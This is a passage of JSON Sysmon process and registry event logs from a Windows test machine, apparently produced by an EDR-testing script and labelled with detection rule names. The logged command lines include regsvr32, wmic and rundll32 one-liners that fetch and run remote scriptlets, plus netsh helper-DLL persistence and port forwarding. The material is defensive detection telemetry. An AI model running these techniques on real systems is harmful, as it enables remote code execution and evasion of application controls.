Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct 
scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ParentProcessId":4288,"ProcessGuid":"747F3D96-6639-5D3F-0000-001074F48900","ProcessId":208,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:45.332"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4933,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:45.581170Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-663D-5D3F-0000-00106F608A00","ProcessId":3240,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:49.535"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4936,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:49.748805Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"MSBuild.exe","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=9672CADE96C657A8860D60923AFDBE4C46A2935D,MD5=4D7D4D92DC7D86B72ABF81821FF83837,SHA256=B60EB62F6C24D4A495A0DAB95CC49624AC5099A2CC21F8BD010A410401AB8CC3,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-663D-5D3F-0000-00106F608A00","ParentProcessId":3240,"ProcessGuid":"747F3D96-663D-5D3F-0000-001062708A00","ProcessId":5340,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:49.881"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4938,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:50.104868Z"}},"Version":5}}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"wmic process get brief /format:\"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c wmic process get brief /format:\"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6641-5D3F-0000-0010A38C8A00","ParentProcessId":4260,"ProcessGuid":"747F3D96-6642-5D3F-0000-0010F69D8A00","ProcessId":4896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:54.044"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4941,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:54.246154Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-07-29 21:33:54.618","Image":"C:\\Windows\\System32\\Wbem\\WMIC.exe","ProcessGuid":"747F3D96-6642-5D3F-0000-0010F69D8A00","ProcessId":4896,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\LQ86GWLO\\Wmic_calc[1].xsl","UtcTime":"2019-07-29 21:33:54.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4942,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:54.630548Z"}},"Version":2}}}},{"detection":["Capture a Network Trace with netsh.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6646-5D3F-0000-0010E32E8B00","ProcessId":5084,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:58.245"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4945,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:58.256845Z"}},"Version":5}}}},{"detection":["Capture a Network Trace with netsh.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-0010E32E8B00","ParentProcessId":5084,"ProcessGuid":"747F3D96-6647-5D3F-0000-0010AE6E8B00","ProcessId":5056,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.141"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4952,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:00.420234Z"}},"Version":5}}}},{"detection":["Netsh Port Forwarding"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-0010A7398B00","ParentProcessId":3868,"ProcessGuid":"747F3D96-6647-5D3F-0000-001065758B00","ProcessId":5048,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.368"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4954,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:00.442242Z"}},"Version":5}}}},{"detection":["Netsh Port Forwarding"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-001029398B00","ParentProcessId":6760,"ProcessGuid":"747F3D96-6647-5D3F-0000-001057768B00","ProcessId":4028,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.390"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4955,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:00.460197Z"}},"Version":5}}}},{"detection":["Suspicious Netsh DLL Persistence"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"netsh.exe add helper AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh.exe add helper AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-001051388B00","ParentProcessId":3824,"ProcessGuid":"747F3D96-6647-5D3F-0000-0010927C8B00","ProcessId":5236,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.544"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4956,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:00.466817Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"192.168.1.1/8000","EventType":"SetValue","Image":"C:\\Windows\\system32\\netsh.exe","ProcessGuid":"747F3D96-6647-5D3F-0000-001057768B00","ProcessId":4028,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PortProxy\\v4tov4\\tcp\\0.0.0.0/8080","UtcTime":"2019-07-29 
21:33:59.803"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4957,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:00.707406Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-DCFC-5D3F-0000-0010F1520000","ProcessId":568,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NdisCap\\Start","UtcTime":"2019-07-29 21:34:00.367"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4962,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:01.057426Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-DCFC-5D3F-0000-0010F1520000","ProcessId":568,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NdisCap\\Start","UtcTime":"2019-07-29 
21:34:00.678"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4964,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:01.660499Z"}},"Version":2}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6652-5D3F-0000-0010B9708C00","ProcessId":5844,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:34:10.292"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4969,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:10.373481Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6652-5D3F-0000-0010B9708C00","ParentProcessId":5844,"ProcessGuid":"747F3D96-6652-5D3F-0000-001058828C00","ProcessId":348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:34:10.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4971,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:10.708142Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6657-5D3F-0000-001029198D00","ProcessId":1808,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:34:15.202"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4975,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:15.226408Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && 
